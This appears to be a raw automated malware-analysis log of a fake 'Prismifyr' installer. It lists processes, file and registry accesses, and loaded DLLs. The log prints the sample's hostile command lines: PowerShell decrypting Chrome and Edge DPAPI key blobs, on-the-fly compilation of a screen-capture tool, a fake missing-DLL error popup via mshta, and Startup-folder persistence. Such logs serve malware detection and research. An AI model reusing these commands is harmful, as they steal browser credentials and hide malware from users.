Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SELECT name FROM sqlite_master WHERE type='table';
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File read: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe "C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe"
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Prismifyr_Installer_v2.1" --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2244,i,14912361022600860785,9095772362069922900,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /fo csv
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Prismifyr_Installer_v2.1" --field-trial-handle=2516,i,14912361022600860785,9095772362069922900,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2512 /prefetch:3
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E2A.tmp" "c:\Users\user\AppData\Local\Temp\screenCapture\CSCEE08CA83D7542AAB04A7698A66ECD4F.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png"
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe"
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv" Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Prismifyr_Installer_v2.1" --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2244,i,14912361022600860785,9095772362069922900,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2 Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Prismifyr_Installer_v2.1" --field-trial-handle=2516,i,14912361022600860785,9095772362069922900,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2512 /prefetch:3 Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser')" Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser')" Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png" " Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()"" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /fo csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E2A.tmp" "c:\Users\user\AppData\Local\Temp\screenCapture\CSCEE08CA83D7542AAB04A7698A66ECD4F.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()"
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: iconcodecservice.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: ffmpeg.dll Jump to behavior
